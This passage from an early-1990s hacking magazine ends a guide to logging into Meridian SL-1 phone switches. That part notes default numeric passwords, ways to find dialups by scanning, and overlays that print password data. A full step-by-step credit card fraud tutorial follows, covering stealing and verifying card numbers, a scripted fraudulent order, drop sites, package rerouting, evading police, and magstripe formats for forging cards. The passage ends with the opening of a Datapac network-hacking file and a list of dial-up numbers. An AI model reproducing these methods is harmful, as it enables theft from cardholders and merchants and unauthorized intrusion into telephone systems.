  14538.  Before running a program you must first gain access to the computer.
  14539. The dialup will normally be a 1200 baud connection, with an even parity,
  14540. databits of 7, and stopbits of 1 (E71). Once connected press <CR> several
  14541. times key to wake the system up. The system SHOULD respond with 'OVL111 BKGD'
  14542. or 'OVL111 IDLE' and now you know it's alright to login. If the response is
  14543. 'OVL000' and then a '>' prompt you are already logged in, and you can go
  14544. straight to loading an overlay.
  14545.  
  14546.  Type 'LOGI' to initiate the login. Make sure when entering commands
  14547. that they are all input in uppercase. The system responds with 'PASS?'. Now
  14548. enter the password, (we do have a password, RIGHT?), it has a default, like
  14549. everything else. The password will always be a 4 digit number, other
  14550. characters are not valid. If you have correctly logged in, the system will
  14551. respond with a '>' prompt. The system will display this prompt whenever
  14552. waiting for operator input and is not running a diagnostic program. Once
  14553. a diagnostic program is running the prompt becomes a '.' (period). If you
  14554. are not logged in, there is no prompt.
  14555.  
  14556.  What follows is an example of what you will see during login.
  14557.  
  14558. { Hit Carriage Return }
  14559. OVL111 IDLE
  14560. .
  14561. .
  14562. .LOGI                        { Initiate Login                    }
  14563. PASS?                        { Enter password, it will not echo  }
  14564. OVL015                       { Error code for incorrect password }
  14565. TTY 01 SCH MTC    16:40
  14566.  
  14567. OVL 45 BKGD
  14568. .LOGI                        { Try again }
  14569. PASS?
  14570. .
  14571. >
  14572. OVL000
  14573. >LD 22           { You are now logged in and ready to load an overlay program }
  14574.    { in this case we are loading overlay 22, a print routine.   }
  14575. PT20000
  14576.  
  14577. REQ TID          { The REQ prompt appears, now enter your selection, in this }
  14578.    { case we want to print the TID (Tape ID)                   }
  14579. TAPE ID:
  14580. LOADED XXXXXX
  14581. DISK/TAPE   XXXXXX
  14582.  
  14583. REQ ISS          { Enter ISS to view the Issue and Release number of the     }
  14584.    { software/switch                                           }
  14585. VERSION 1011
  14586. RELEASE 14
  14587. ISSUE 39
  14588.  
  14589.  
  14590. REQ END          { Enter END to quit this overlay }
  14591. >LOGO
  14592. >
  14593. .                { Logout and hangup }
  14594.  
  14595.  
  14596.  Now after gaining this information, we can determine what type of
  14597. system we're dealing with. Notice that the version number is 1011. Now
  14598. refer back to the listing of SL-1 Models for the information we seek. We are
  14599. logged into an x11 system (last 2 digits of the version number). Unfortunately,
  14600. there are two system with x11 generics, and none of which have a release
  14601. number of 14, so we're either dealing with an SL1-M or an SL1-S, with either a
  14602. 60-400 or 30-160 line capability respectively. Although this information isn't
  14603. extremely useful, it comes in handy when determining how large the system is.
  14604.  
  14605.  
  14606.          Overlay Programs
  14607.          ~~~~~~~~~~~~~~~~
  14608.  
  14609.  Upon first logging in, no program is loaded, and you must load a
  14610. program (overlay) into system memory. This is done by the command 'LD'
  14611. followed by a space and the overlay number. To load overlay 10 you would
  14612. simply do a 'LD 10'. It will take approximately 1 minute to load the overlay
  14613. into memory from tape, if the system uses a tape drive. If the system uses
  14614. disk storage then it will load quickly. Once the program is loaded, a 'REQ'
  14615. (request) prompt will appear. The system is now waiting for input from the
  14616. administrator.
  14617.  
  14618.  There are many different overlays which can be used, all of which
  14619. are explained in the following section.
  14620.  
  14621. Number     Name                          Purpose
  14622. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  14623.   10   500/2500 Type     Allows new 500/2500 telephone data blocks to be
  14624.        Telephone         generated, existing office data modified, moved
  14625.                          to a new TN location on the same loop, or removed
  14626.                          from the system. Standard telephone sets.
  14627.  
  14628.   11   SL-1 Type         Allows new SL-1 telephone data blocks to be
  14629.        Telephone         generated, existing office data to be modified,
  14630.                          moved to a new TN location on the same loop, or
  14631.                          removed from the system.
  14632.  
  14633.   12   Attendant         Allows new SL-1 attendant console data blocks to be
  14634.        Console           generated, existing office data to be modified,
  14635.                          moved to a new TN location on the same loop, or
  14636.                          removed from the system.
  14637.  
  14638.   13   DIGITONE          Allows new DIGITONE and SL-1 tone detectors blocks
  14639.        Receiver and      to be generated, moved to a new TN location on the
  14640.        SL-1 Tone         same loop, or removed from the system.
  14641.        Detectors
  14642.  
  14643.   14   Trunks            Allows new trunk data blocks to be generated,
  14644.                          existing office data modified, moved to a new TN
  14645.                          location on the same loop, or removed from the
  14646.                          system.
  14647.  
  14648.   15   Customer          Allows new customer data blocks to be generated,
  14649.                          existing office data modified, or removed from the
  14650.                          system.
  14651.  
  14652.   16   Trunk Route/      Allows new trunk/ATM route and ATM schedule hours
  14653.        Automatic Trunk   data blocks to be generated, existing office data
  14654.        Maintenance       modified, or removed from the system.
  14655.  
  14656.   17   Configuration     Allows the configuration record to be modified to
  14657.        Record            reflect changes in the system parameters.
  14658.  
  14659.   18   Speed Call        Allows speed call/system speed call and group call
  14660.        Group Call Data   data to be generated, modified, or removed from the
  14661.                          system.
  14662.  
  14663.   19   Code Restriction  Allows code restriction data block to be generated,
  14664.                          modified, or removed from the system.
  14665.  
  14666.   20   Print Routine 1   Allows the printing of:
  14667.                          - SL-1 TN data blocks
  14668.                          - 500 TN data blocks
  14669.                          - attendant TN data blocks
  14670.                          - trunk TN data blocks
  14671.                          - DIG data blocks
  14672.                          - group call data
  14673.                          - templates
  14674.                          - speed call lists
  14675.                          - hunting patterns of stations
  14676.                          - unused units
  14677.                          - unused card positions
  14678.                          - terminal numbers
  14679.  
  14680.   21   Print Routine 2   Allows the printing of:
  14681.                          - customer data blocks
  14682.                          - code restriction data blocks
  14683.                          - route data blocks
  14684.                          - a list of trunks in a route
  14685.                          - ATM data
  14686.                          - ATM schedules
  14687.                          - TN associated with CAS keys
  14688.  
  14689.   22   Print Routine 3   Allows the printing of:
  14690.                          - the configuration record
  14691.                          - directory number to TN matrix
  14692.                          - equipped packages
  14693.                          - history
  14694.                          - password numbers
  14695.                          - ROM QPC number
  14696.                          - station category indication
  14697.                          - version and issue of generic
  14698.  
  14699.   23   ACD/Message       Allows ACD data, ACD management report schedules,
  14700.        Center            and Message Center data to be generated, modified,
  14701.                          or removed.
  14702.  
  14703.   24   DISA              Allows data for direct inward system access to be
  14704.                          generated, modified or printed.
  14705.  
  14706.   25   Move Data         Allows movement or interchanges of data between
  14707.        Blocks            loops, shelves and packs in the same customer
  14708.                          group.
  14709.  
  14710.   26   Do Not Disturb    Allows DND groups to be formed, changed, merged,
  14711.                          removed or printed.
  14712.  
  14713.   28   ANI Route         Allows ANI route selection data block to be
  14714.        Selection         generated, modified, removed, or printed.
  14715.  
  14716.   29   Memory/           Used to determine the amount of unused memory, and
  14717.        Management        to determine if enough memory is available to add
  14718.                          new data. Also used to respond to error messages
  14719.                          SCH601 and 603 on Meridian SL-1 XN systems.
  14720.  
  14721.   49   NFCR              Allows code restriction data blocks to be defined,
  14722.                          modified, removed, or printed.
  14723.  
  14724.   50   Call Park         Allows call park data to be generated, modified,
  14725.                          removed, or printed.
  14726.  
  14727.   73   Digital Trunk     Allows Digital Trunk Interface data to be generated
  14728.        Interface         or modified.
  14729.  
  14730.   81   Features/         Allows stations to be listed or counted according
  14731.        Stations Print    to their features.
  14732.  
  14733.   82   Hunt Chain/       Allows printing of hunting patterns and multiple
  14734.        Multiple          appearance groups.
  14735.        Appearance Print
  14736.  
  14737.   83   TN Sort Print     Allows printing of stations according to station DES.
  14738.  
  14739.   84   DES Entry         Allows the assignment of station DES (description)
  14740.                          to 500/2500 sets.
  14741.  
  14742.   85   DES Entry         Allows the assignment of station DES (description)
  14743.                          to SL-1 sets.
  14744.  
  14745.   86   ESN 1             Allows electronic switched network data defining
  14746.                          BARS/NARS/CDP features to be generated, modified,
  14747.                          or printed.
  14748.  
  14749.   87   ESN 2             Allows electronic switched network data defining
  14750.                          BARS/NARS/CDP features to be generated, modified,
  14751.                          or printed.
  14752.  
  14753.   88   Authorization     Allows data for Basic Authorization Code (BAUT) and
  14754.        Code              Network Authorization Code (NAUT) to be generated,
  14755.                          modified, or printed.
  14756.  
  14757.   90   ESN 3             Allows data for ESN network translation tables to be
  14758.                          generated, modified, or printed.
  14759.  
  14760.   93   Mult-Tenant       Used to enable and administer multi-tenant service.
  14761.        Service           For example, more than one company can use the same
  14762.                          PBX.
  14763.  
  14764.  Those are the main overlays used to modify setups and print the
  14765. system configuration information. SL-1's are mainly used in buildings, and
  14766. by larger companies, ranging from department stores to complete office
  14767. complexes. The dialups are commonly found on an extension of the PBX. You
  14768. can generally come across the dialup while scanning extensions on a Meridian
  14769. Voice Mail system. Meridian SL-1's are a very common switch used on WATS
  14770. lines, generally by larger companies. I've also talked to several people who
  14771. have encountered the actual dialup modem to the switch on the public
  14772. phone network (exchange scanning). Once you have found one, it's easy to
  14773. identify with it's trademark 'OVL' greeting.
  14774.  
  14775.  
  14776.           Meridian Manager
  14777.           ~~~~~~~~~~~~~~~~
  14778.  
  14779.  Obviously SL-1 administrators can't be expected to program a switch
  14780. using such archaic methods, and remembering every prompt and required input.
  14781. Northern Telecom has developed terminal software that makes the job easier,
  14782. which replaces the traditional teletype setup with a PC running their terminal
  14783. software. Each copy of the software is sold at upwards of $5000 for a site
  14784. license, and you are entered into a license agreement with NT. As Northern
  14785. Telecom puts it...
  14786.  
  14787.  "Title to and ownership of Meridian SL-1 software shall at all times
  14788. remain with Northern Telecom. Meridian SL-1 software shall not be sold
  14789. outright and the use thereof by the customer shall be subject to the parties
  14790. entering into software agreement as specified by Northern Telecom."
  14791.  
  14792.  Each copy contains a serial number which matches the PBX's own serial
  14793. number, thus cannot be used on any switch other than one specified in your
  14794. license agreement. The software provides a user friendly method to add,
  14795. remove, and modify information, without dealing with the unfriendly switch
  14796. directly. Initially the software will phone the specified switch, and check
  14797. the serial number of the switch. After this, it will load and run the print
  14798. overlays, and ascii capture all output, building several database files
  14799. locally, on your own system. After this is completed, it disconnects, and
  14800. you now have the complete configuration of the switch sitting on your system.
  14801. You now make the necessary modifications, and upon completion, the software
  14802. again calls the switch, and updates the switches database. The software,
  14803. called the Meridian Manager, comes complete with a full internal tutorial on
  14804. how to use it, and is very helpful. Thanks Northern Telecom, for making it so
  14805. easy!
  14806.  
  14807.        Additional Information
  14808.        ~~~~~~~~~~~~~~~~~~~~~~
  14809.  
  14810.  If you require programming information, probably the handiest piece
  14811. of material that I've found is the Data Administration, Generic X11 : Pocket
  14812. Reference Guide. This is a pocket book that contains a listing of all
  14813. Overlay Programs, possible inputs and error codes. The reference is about
  14814. 100 pages, and can be ordered from Northern Telecom, the order number being
  14815. P0674785,S086/01. Social Engineering may be required.
  14816.  
  14817. * Meridian and SL-1 are trademarks of Northern Telecom Limited.
  14818.  
  14819. Greetings to Talsfalon, Akalabeth, Okinawa, Mechanix, and all those I've
  14820. forgotten. See you at hohocon, we'll be giving away one of the previously
  14821. mentioned Pocket Reference Guide's at the raffle.
  14822.  
  14823. I can be reached at my email address, iceman@silicon.bison.mb.ca, or my own
  14824. system at 204-669-7983.
  14825.  
  14826. -----BEGIN PGP PUBLIC KEY BLOCK-----
  14827. Version: 2.3
  14828.  
  14829. mQCNAiwKJFQAAAEEALaKeir7NjTo0SawUR5jC7EIxTl+f1Yv3AvxwmHMOC0aZJwq
  14830. WHqZajrdQ0UXKS6j/2bKgFwfuo76O/KeZmuo4Q05JLRl1epO6SfGMjfSP0zR2y0n
  14831. 2oSsiA9VNpI/eeZAqJpa15ItpWEXZOwNIHKvTjEqOjADwtVCvkRf68TwYncbAAUR
  14832. tCNJY2VtYW4gPGljZW1hbkBzaWxpY29uLmJpc29uLm1iLmNhPg==
  14833. =BlEm
  14834. -----END PGP PUBLIC KEY BLOCK-----
  14835.  
  14836.            Iceman
  14837.   * The Digital Resistance *
  14838.                               ==Phrack Magazine==
  14839.  
  14840.                  Volume Four, Issue Forty-Four, File 20 of 27
  14841.  
  14842. [** NOTE:  The following file is presented for informational and
  14843.            entertainment purposes only.  Phrack Magazine takes NO
  14844.            responsibility for anyone who attempts the actions
  14845.            described within. **]
  14846.  
  14847. ****************************************************************************
  14848.  
  14849. SSSSS AAAAA FFFFF EEEEE     AAAAA N    N DDDD      EEEEE AAAAA SSSSS Y   Y
  14850. S     A   A F     E         A   A NN   N D   D     E     A   A S      Y Y
  14851. SSSSS AAAAA FFF   EEE       AAAAA N N  N D   D     EEEEE AAAAA SSSSS   Y
  14852.     S A   A F     E         A   A N  N N D   D     E     A   A     S   Y
  14853. SSSSS A   A F     EEEEE     A   A N    N DDDD      EEEEE A   A SSSSS   Y
  14854.  
  14855.  CCCCCCCC  AAAAAAAA  RRRRRRRR  DDDDDDD   IIIIIIII  NN     NN  GGGGGGGG
  14856.  CC        AA    AA  RR    RR  DD    DD     II     NNNN   NN  GG
  14857.  CC        AA    AA  RR   RR   DD    DD     II     NN  N  NN  GG
  14858.  CC        AAAAAAAA  RRRRRR    DD    DD     II     NN   N NN  GG  GGGG
  14859.  CC        AA    AA  RR   RR   DD    DD     II     NN    NNN  GG    GG
  14860.  CCCCCCCC  AA    AA  RR    RR  DDDDDDD   IIIIIIII  NN     NN  GGGGGGGG
  14861.  
  14862.                                  BY
  14863.  
  14864.                               VaxBuster
  14865.  
  14866.  
  14867.     This file is ONLY to be published in Phrack, and has not and
  14868.  will not be released, or published in any other magazine.
  14869.  
  14870.     And a disclaimer: I do not engage in, or condone ANY illegal
  14871.  activity, including credit card fraud, and this article should
  14872.  be used for INFORMATIONAL PURPOSES ONLY.  Those wishing to
  14873.  engage in unlawful activities should be warned that there are
  14874.  severe penalties that exist that could render the remainder of
  14875.  your life useless.
  14876.  
  14877.     In the past few years, I have had a ton of people come up and
  14878.  ask, "I want to card something, but I'm afraid I'll get caught
  14879.  because I don't really know what I'm doing, can u give me tips?"
  14880.  This article is designed for those people, people who already
  14881.  have carded and are looking for better/easier ways to do it.
  14882.  One point you'll see me address VERY strongly in this article
  14883.  is safety.  I don't want to see any of my friends end up in
  14884.  jail.  See, like any unlawful activity, you are going to have
  14885.  certain risks, and this article is designed to ELIMINATE those
  14886.  risks, or narrow them down tremendously.  I'm going to take
  14887.  you step by step through the ENTIRE process from the time you
  14888.  pick up the phone until the time you are safely at home
  14889.  reading the manual to your new toy.
  14890.  
  14891.  
  14892. Stage One - Getting the credit card information
  14893.  
  14894.     Getting the information is probably going to be the easiest of all
  14895. the steps involved here.  You could go trashing at your local restaurant,
  14896. retail store, or bank.  You could open up Federal Express boxes and find
  14897. them there.  You could hack into an establishment and get them from there.
  14898.  
  14899.     It doesn't really matter HOW you get it, but you want to make sure
  14900. you get the person's full name, their complete credit card number, their
  14901. expiration, and hopefully an address.  In the event that you found the
  14902. credit card number locally and just have the name, check your local White
  14903. Pages for their address or use a service like Compuserve to pull up their
  14904. address.  You'll probably find that the address closest to the store is the
  14905. right one.  Also, if you can get a hold of the issuing bank, this will help.
  14906.  
  14907. Stage Two - Verifying the credit card information
  14908.  
  14909.     There are several ways you can do this.  And remember when you are
  14910. doing this that it would be VERY helpful to get the available line of credit.
  14911.  
  14912.  1> If you have the issuing bank, call the bank and ask for their
  14913.     AUTOMATED CREDIT SERVICE.  They ALL have them.  Its an 800 number
  14914.     and it's printed on the back of the card.  Basically, this service
  14915.     is set up so that credit card holders can check their available
  14916.     balance, available credit, etc.  Usually, they have SOME kind of
  14917.     security that prevents the normal person from walking up and
  14918.     typing in someone else's number.  This security is lame.  You
  14919.     either have to know the last 4 digits of their social security
  14920.     number or their zip code.  99 times out of 100, you'll find that
  14921.     you'll need their zip code though.
  14922.  
  14923.  2> So you don't have the issuing bank? Just use a credit card verifier
  14924.     with a merchant number. Don't place a HUGE purchase, it can be any
  14925.     amount, so make it small, like say $8.31 or something.
  14926.  
  14927.  3> Use a 800 porn service that accepts credit cards.
  14928.  
  14929.  4> Use a credit bureau like CBI, TRW, or InfoAM.  These services
  14930.     are very nice because you can easily check their available
  14931.     credit line.  It also has other information that could be useful.
  14932.  
  14933.     Remember, when you are doing this, don't make the calls from your
  14934. house, and if it's impossible to do otherwise, go through a divertor and a
  14935. code.  Put a couple of levels of protection between YOU and them.  This
  14936. will cut down on any tracks leading back to you.
  14937.  
  14938. Stage Three - Finding the company
  14939.  
  14940.     You are looking for a relatively small company - one that has
  14941. what you need in stock, but not one that needs operators to answer calls.
  14942. Most places (even retail stores like Radio Shack) will ship out to anyone
  14943. any place in the US.  Just tell them you are handicap, or can't get around
  14944. very well, and they will be more than happy to help.  You want to find a
  14945. place that has Federal Express.  And of course, you're looking for one
  14946. that accepts the type of card that you have.  Incidentally, for those who
  14947. are VERY new at this :
  14948.  
  14949.     If first digit of card is a:
  14950.  
  14951.                     3 American Express (15 digits)
  14952.                     4 Visa             (13 or 16 digits)
  14953.                     5 Mastercard       (16 digits)
  14954.                     6 Discover         (16 digits)
  14955.  
  14956. Stage Four - Placing the call
  14957.  
  14958.     Ok, before we go any further, make sure you have a call back number.
  14959. I use a VMB that is in the local area that I'm supposedly calling from.
  14960. You should almost always be calling for a business, because companies treat
  14961. businesses better than your standard customer.  Tell them you need to have
  14962. the products the VERY next day, and if they can't have it to you by then,
  14963. tell them you'll find another company (Hell, who wants to wait? :) )
  14964. When you call them, just relax, and pretend like your just placing an order
  14965. for yourself, nothing is out of the ordinary, but you just need to start
  14966. that special project in the morning.  Make sure you have all the information
  14967. in front of you.  Call during business hours, not on Friday, Saturday, or
  14968. Sunday.  Here's a transcript of one of my calls:
  14969.  
  14970.     "Hello XXX, this is Mark can I help you?" (always get their name)
  14971.  
  14972.     "Yes, My name is Joe and I'm calling from XXX, I'd like to place
  14973.      an order."
  14974.  
  14975.     "Ok sir, I'd more than happy to help you, let me get some info
  14976.      from you first.  Ok. Can I have your name?"
  14977.  
  14978.     "Joseph XXX"
  14979.  
  14980.     "Your address, Joe?"
  14981.  
  14982.     "XXXX XXXX lane, and thats in XXXXXXX XX, the zip there is XXXXX"
  14983.  
  14984.     "Ok, and a number where we can reach you if there is any problems?"
  14985.  
  14986.     "XXX-XXX-XXXX"
  14987.  
  14988.     "Ok, what would you like to order?"
  14989.  
  14990.     "I need four of those laser jet printers, I believe I spoke with
  14991.      someone on Friday about them, and the part number is XXXXX-XX.
  14992.      Also, I had a question on those printers too, what type of
  14993.      warranty do they carry?" (Always ask about warranty!)
  14994.  
  14995.     "Well sir, these particular models have one year parts and labor
  14996.      warranty.  You can buy an additional 5 year warranty for only
  14997.      $49 a piece too.  We have an unconditional guarantee of 90 days."
  14998.  
  14999.     "Ok, I'll take the 5 year warranty on all of them then."
  15000.  
  15001.     "Do you need any toner cartridges, or printer paper?"
  15002.  
  15003.     "No, all I need are the printers."
  15004.  
  15005.     "Ok, how would you like these shipped?"
  15006.  
  15007.     "You have Federal Express, right?"
  15008.  
  15009.     "Yeah."
  15010.  
  15011.     "Ok, Ship them PRIORITY overnight then."
  15012.  
  15013.     "Ok, and how are you paying for your order?"
  15014.  
  15015.     "With our corporate XXXXXX card."
  15016.  
  15017.     "Ok, can I have your account number?"
  15018.  
  15019.     "Sure its XXXX-XXXX-XXXX-XXXX"
  15020.  
  15021.     "Ok, and the Billing information is the same as your ship to
  15022.      address ?"
  15023.  
  15024.     "Thats right."
  15025.  
  15026.     "Ok, then this package will go out today, and you'll have the
  15027.      printers by tomorrow morning."
  15028.  
  15029.     "Ok, and can you do me a favor?"
  15030.  
  15031.     "Sure."
  15032.  
  15033.     "Whenever your shipping department ships the package, get the
  15034.      Federal Express Tracking Number for me, and leave it on my
  15035.      Voice Mail System?"
  15036.  
  15037.     "Sure, I'll do that personally later on tonight."
  15038.  
  15039.     "Ok. Thank you very much."
  15040.  
  15041.     "Thank YOU sir."
  15042.  
  15043.     Ok - a few things I want to mention.  First, try to determine what type
  15044. of credit card authorization they have.  If its retail store, they probably
  15045. just have ZION terminals, just the standard type or swipe style.  These don't
  15046. check the address, or anything, just to make sure the card is valid and
  15047. has enough credit left.  The other type check all the info, including the
  15048. name and address.  Its very important that you are SHIPPING to the BILLING
  15049. address, because if you change the ship to, they may have a tendency to
  15050. get a tad suspicious.  Also, the reason you could use that you need the
  15051. Fedex Tracking Number is for your Mail room.  Use your imagination, but
  15052. keep your story the same, don't adlib too much, cause you may fuck up,
  15053. but stick to the above format, it works very well.  Always try to be as
  15054. pleasant as possible, because in the event you couldn't check the credit
  15055. limit, you may have to give them another card.
  15056.  
  15057. Stage 5 - Finding a drop site
  15058.  
  15059.     This is one of the harder things to do.  If the billing address
  15060. of the card is local to you, you may just want to go their house to pick up
  15061. the package.  If not, find an apartment building close (but not too close)
  15062. to where you live.  Or find a house that has a for sale sign in the front
  15063. yard.  Or if you know some school buddy of yours that is away for vacation
  15064. use his house (In that event, make SURE he has NO idea your doing this)
  15065. Whatever the case may be, just find a place that is relatively secluded from
  15066. the street, where there are places for you to park inconspicuously.
  15067. Apartment buildings work EXTREMELY well.
  15068.  
  15069. Stage 6 - Rerouting the package
  15070.  
  15071.     This is a little trick one of my good friends showed me.  It works
  15072. extremely well.  Call up Federal Express with your airbill number.  The
  15073. number is 800-238-5355.  Tell them that you are not going to be in town
  15074. that day to sign for your package that you will be at another location,
  15075. and ask them if they could please send the package to a new address.  They
  15076. may say that it will take an additional day to do that, depending on how
  15077. far away it is.  INSIST that it arrives the next day, tell them its
  15078. extremely important, and don't take any shit from them, ask for their
  15079. supervisor if they gave you any problems.  Their commitment is
  15080. overnight.  By the way, call Federal Express AS SOON AS you know they
  15081. physically have the package, this way you give them as much time as they
  15082. need to reroute.  Obviously your sending the package to your drop site that
  15083. you found.
  15084.  
  15085. Stage 7 - Picking up the package
  15086.  
  15087.     This is by far the most DANGEROUS part of it.  If you are going to
  15088. get caught, this is where its going to happen.  DON'T have a school buddy
  15089. pick it up for you.  Instant doom.  DON'T pay someone to do it for you,
  15090. lord knows they will sell you out in a second.  Not to mention, you're
  15091. probably brighter than the average eggplant, so you may be able to talk
  15092. your way out. "A guy on the street paid me this $20 bill to do it, I said
  15093. what the fuck"  PLEASE USE EXTREME CAUTION WHEN DOING THIS.
  15094.  
  15095.     OK. Call Federal Express, and make sure the package will be arriving
  15096. that day, and that everything is on schedule.  Ask them what the route number
  15097. is, an estimate of when it will be there, and their commitment time for
  15098. that particular zip code.  Then, go there earlier than you need to be, and
  15099. check out the place, look around for anyone who seems abnormal, look for
  15100. escape routes, exits.  Look around, get a feel for where you are, and try
  15101. to ration out why you might just be standing there or why you would have
  15102. needed to pick up the package.  Remember, if you used all the precautions
  15103. I've talked about, you should be in perfect shape.  Just relax, be cool, and
  15104. everything will work out.
  15105.  
  15106.     Walk around for a little bit, and find out the possible directions
  15107. the Federal Express Van will be coming from.  Walk in front of the house
  15108. just when he arrives. Pretend as though your just on your way home or just
  15109. on your way out the door.  Sign for it, and you're done.
  15110.  
  15111.     Ok, you say, I'm the nervous type, and I don't want the guy giving
  15112. my description to the police, FBI, etc. (As though they will remember 1 out
  15113. of the hundreds of deliveries a day)  Call up Federal Express and ask for
  15114. a signature release.  This gives Fedex the right to leave the package at
  15115. your front door, and this removes their responsibility.  OR, leave a note
  15116. with your signature (not printed) on the door, mailbox, etc.  Remember though
  15117. that the guy may come home (or look out his window) and see the package, or
  15118. you signing it.
  15119.  
  15120.     Remember there is nothing saying that you have to be there when the
  15121. package arrives.  You can get a signature release or leave a note.  Make
  15122. sure you are there as soon as possible AFTER they leave the package.  I
  15123. actually prefer to be there, because when I just let it go, and check back
  15124. later, it is almost NEVER there.  Either a> someone stole it b> a neighbor
  15125. picked it up and put it in their house for them c> the owner is actually
  15126. home and got the package (which is REALLY bogus, cause it's on their card!)
  15127.  
  15128.     I have ALWAYS used an apartment building.  I have ALWAYS been there
  15129. to pick the package up.  I have never been busted.  See, if you understand
  15130. how the system works, you know that there is NO way that anyone knows that
  15131. it is an illegal purchase.  If you look at it on a time line :
  15132.  
  15133.   <----2:00pm-------2:05pm------8:00pm-----10am--->
  15134.        verify       call        reroute    pickup
  15135.  
  15136.     Now, if there is a problem, it will probably be either a> not enough
  15137. credit left on the card (which is nothing, they will leave a message on your
  15138. vmb) b> they called directory assistance and actually called that number or
  15139. c> VISA/MC/AMEX/DISC called the customer to verify the purchase because it
  15140. was larger than usual.
  15141.  
  15142.     So obviously, if they got in touch with the card holder, or visa/etc
  15143. called the card holder, they AREN'T going to ship the package - meaning you
  15144. aren't going to show up anyways.  Of course you never use a drop site more
  15145. than once, you never use a company more than once, and you never use a card
  15146. more than once.
  15147.  
  15148.     Once you get your package, KEEP YOUR MOUTH SHUT.  Don't jump on IRC,
  15149. and say, "Hey Cameron, I just carded a new Amiga 4000."  And if you do
  15150. eventually tell someone that you carded it, NEVER USE ANY SPECIFICS, no
  15151. information about the company, the drop house, the name on the card, NOTHING.
  15152. If you follow these instructions, you can guarantee you will have absolutely
  15153. no problems, I have been doing this for quite some time, and have NEVER been
  15154. bothered by any law enforcement concerning this.  I have never found anyone
  15155. who was careful that got busted.  The people who have gotten busted for
  15156. carding have either bragged about it, or let someone know before hand, or have
  15157. been set up.
  15158.  
  15159.     I have tried to cover all bases, but I'm positive I've missed a few
  15160. so if anyone has questions, let me know.  I am always open to helping people
  15161. and can be found on the IRC, in either #hack or one of the better #hack
  15162. alternatives.
  15163.  
  15164.     In addition to carding by phone, there is another possibility, that
  15165. is writing credit cards with a magnetic stripe writer.  A certain group did
  15166. this for EIGHT years, before getting caught.  This is worth a whole article
  15167. to itself, but I'll just go over some guidelines.
  15168.  
  15169.     Track I is 210 bpi. Track II is 75 bpi.
  15170.  
  15171.     The next chart shows the Magnetic Stripe Data Format (Track I)
  15172.  
  15173.  Field #   Length    Name of Field
  15174.  -------   ------    -------------
  15175.  
  15176.  1         1         Start Sentinel (STX)
  15177.  2         1         Format Code
  15178.  3         13/16     Primary Account Number
  15179.  4         1         Separator (^) HEX 5E
  15180.  5         2-26      Card Holder Name
  15181.  6         1         Separator (^) HEX 5E
  15182.  7         4         Card Expiration in format MMYY
  15183.  8         3         Service Code (?) 000 WORKS.
  15184.  9         0/5       Pin Verification Field
  15185.  10                  Discretionary Data Depends on 3, 5, 9
  15186.  11        11        Visa Reserved Always last 11 positions
  15187.  12        1         End Sentinel (ETX)
  15188.  13        1         LRC
  15189.  
  15190.     Maximum Record Length is 79 Characters
  15191.  
  15192.     The next chart shows the Magnetic Stripe Data Format (Track II)
  15193.  
  15194.  Field #   Length    Name of Field
  15195.  -------   ------    -------------
  15196.  
  15197.     1         1         Start Sentinel (STX)
  15198.     2         13/16     Primary Account Number
  15199.     3         1         Separator (=) HEX 3D
  15200.     4         4         Card Expiration Date in format MMYY
  15201.     5         3         Service Code (?) 000 works.
  15202.     6         0/5       Pin Verification Field
  15203.     7                   Discretionary Data Depends on 2, 6
  15204.     8         1         End Sentinel (ETX)
  15205.     9         1         LRC
  15206.  
  15207.     "The LRC is calculated by performing a BITWISE XOR (Exclusive OR) on all
  15208. ASCII values of the characters in the Inquiry - EXCLUDING the <STX> but
  15209. INCLUDING the <ETX>."
  15210.  
  15211. <STX> is HEX 02.
  15212. <ETX> is HEX 03.
  15213.  
  15214.     By the way, for my last article, "TTY SPOOFING", check Phrack 41 File 8.
  15215.  
  15216. ***** MANY thanks go out to my friends, of whom I won't mention because of
  15217.       the delicacy of this topic.  I appreciate them sharing their knowledge
  15218.       with me, and I feel I'm kind of returning the favor by writing this
  15219.       article.  Thanks also go out to the Phrack Staff, both past and present
  15220.       for putting out an excellent magazine, and continuing to distribute
  15221.       information to the computer underground.
  15222.  
  15223. ***** Happy Hacking and Safe Carding!
  15224.       VaxBuster '93
  15225.                               ==Phrack Magazine==
  15226.  
  15227.                  Volume Four, Issue Forty-Four, File 21 of 27
  15228.  
  15229. ****************************************************************************
  15230.  
  15231.             ************************************************
  15232.            /                    DataPac                     \
  15233.           /                   Synapse 403                    \
  15234.          /                                                    \
  15235.         ********************************************************
  15236.  
  15237.     All of us I am sure have read penultimate files on the workings of
  15238. Tymnet or in some cases Sprintnet. These are staples in a hacker's diet.
  15239. In fact any second rate "underground" BBS has complete sections on BT
  15240. North America and the nets available therein. However one such net you
  15241. will most likely see very little on, is Datapac.
  15242.  
  15243.     Datapac was originated in the late seventies by Telecom Canada, a
  15244. large partnership of Telcos and businesses interested in high speed data
  15245. transfers between Business & Government systems which would be hassle free
  15246. and cheaper in the long run. (The birth of most PSN's really.)
  15247.  
  15248.     The significance of Datapac however is that it has changed very little
  15249. by way of security in the past ten years, although it has extended
  15250. access to most of the globe in one fashion or another. Datapac is not
  15251. only a hacker's utopia due to lax (in some cases non-existant) security;
  15252. it is also, for the most part, safe ground (this term is, of course, used
  15253. somewhat lightly) for beginners and the unsure to try their luck/skill
  15254. at the game of packet switched network hacking. The Datapac net is most
  15255. important to Canadian Hackers who have direct access to it, and
  15256. therefore (if you're lucky) direct access to the world.
  15257.  
  15258. A list of dial-up ports in Canada follows.
  15259.  
  15260. CITY (PROVINCE)           DIAL NUMBER (SPEED 2400)     DIAL NUMBER (SPEED 9600)
  15261. ===============           ========================     ========================
  15262.  
  15263. (TOLL FREE-CANADA)                                         800-565-8805
  15264. Abbotsford (BC)                                            604-855-3632
  15265. Banff-Canmore(ALTA)                                        403-762-5603
  15266. Barrie (ONT)                    705-721-2411               705-726-0168
  15267. Bathurst (NB)                   506-548-8658               506-548-9837
  15268. Belleville (ONT)                                           613-969-1161
  15269. Brampton (ONT)                  416-796-3808
  15270. Brantford (ONT)                 519-758-0058
  15271. Brockville (ONT)                613-345-7550               613-498-0676
  15272. Calgary (ALTA)                  403-263-5021               403-265-4081
  15273. Campbell River (BC)             604-287-9166               604-286-9800
  15274. Chatham (ONT)                   519-351-8950
  15275. Chicoutimi - Jonqui (QUE)       418-543-8013               418-543-8512
  15276. Chilliwack (BC)                                            604-792-5218
  15277. Clarkson (ONT)                  416-823-6010
  15278. Cornerbrook (NFLD)              709-634-9060               709-634-8406
  15279. Cornwall (ONT)                                             613-936-9145
